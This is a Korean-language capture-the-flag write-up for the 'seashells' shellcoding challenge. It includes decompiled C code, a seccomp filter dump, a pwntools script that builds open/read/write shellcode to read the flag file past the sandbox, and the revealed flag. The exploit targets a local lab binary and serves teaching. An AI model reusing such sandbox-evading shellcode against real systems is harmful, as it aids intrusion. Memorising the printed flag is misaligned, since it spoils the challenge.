# Description
She picks seashells by the seashore. But she is very picky with what she keeps.
Author: omelette_keychain
Plain Text
복사
# 분석
코드를 보면 입력 받은 buf의 데이터를 dest에 복사하고 dest에 있는 코드를 실행한다.
int __fastcall main(int argc, const char **argv, const char **envp)
{
size_t v3; // rdx
int v5; // [rsp+14h] [rbp-52Ch]
void *dest; // [rsp+20h] [rbp-520h]
_BYTE buf[1288]; // [rsp+30h] [rbp-510h] BYREF
unsigned __int64 v8; // [rsp+538h] [rbp-8h]
v8 = __readfsqword(0x28u);
seccomp_initialisation(argc, argv, envp);
v3 = strlen("Give me the sea shells that you collected >>");
write(1, "Give me the sea shells that you collected >>", v3);
if ( (unsigned int)read(0, buf, 0x500u) == -1 )
{
perror("read failed");
return -1;
}
else
{
v5 = sysconf(30);
dest = mmap(0, v5, 7, 34, -1, 0);
if ( dest == (void *)-1LL )
{
perror("mmap failed");
return -1;
}
else
{
memcpy(dest, buf, v5);
((void (*)(void))dest)();
munmap(dest, v5);
return 0;
}
}
}
C
복사
간단한 shellcoding 문제로 볼 수 있고, seccomp_initialisation를 통해서 syscall을 필터링하고 있다.
필터링하고 있는 syscall을 피하면 쉘을 획득 할 수 있다.
seccomp-tools 결과
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x0c 0xc000003e if (A != ARCH_X86_64) goto 0014
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x09 0xffffffff if (A != 0xffffffff) goto 0014
0005: 0x15 0x07 0x00 0x00000000 if (A == read) goto 0013
0006: 0x15 0x06 0x00 0x00000001 if (A == write) goto 0013
0007: 0x15 0x05 0x00 0x00000002 if (A == open) goto 0013
0008: 0x15 0x04 0x00 0x00000003 if (A == close) goto 0013
0009: 0x15 0x03 0x00 0x00000009 if (A == mmap) goto 0013
0010: 0x15 0x02 0x00 0x0000000b if (A == munmap) goto 0013
0011: 0x15 0x01 0x00 0x0000003c if (A == exit) goto 0013
0012: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0014
0013: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0014: 0x06 0x00 0x00 0x00000000 return KILL
C
복사
Exploit 방향
read, write, open, close을 이용해서 flag를 획득하는 문제다.
# Payload
from pwn import *
filename = "./seashells"
e = ELF(filename)
p = process(filename)
context.arch = 'amd64'
shellcode = shellcraft.pushstr("./flag")
shellcode += shellcraft.open('rsp', 0, 0)
shellcode += shellcraft.read('rax', 'rsp', 100)
shellcode += shellcraft.write(1, 'rsp', 100)
shellcode = asm(shellcode)
p.sendlineafter(b" >>", shellcode)
p.interactive()
Python
복사
# Flag
shaktictf{u_g0t_wh@t_u_w15h3d__th3_s3@sh311_f1@g}
Plain Text
복사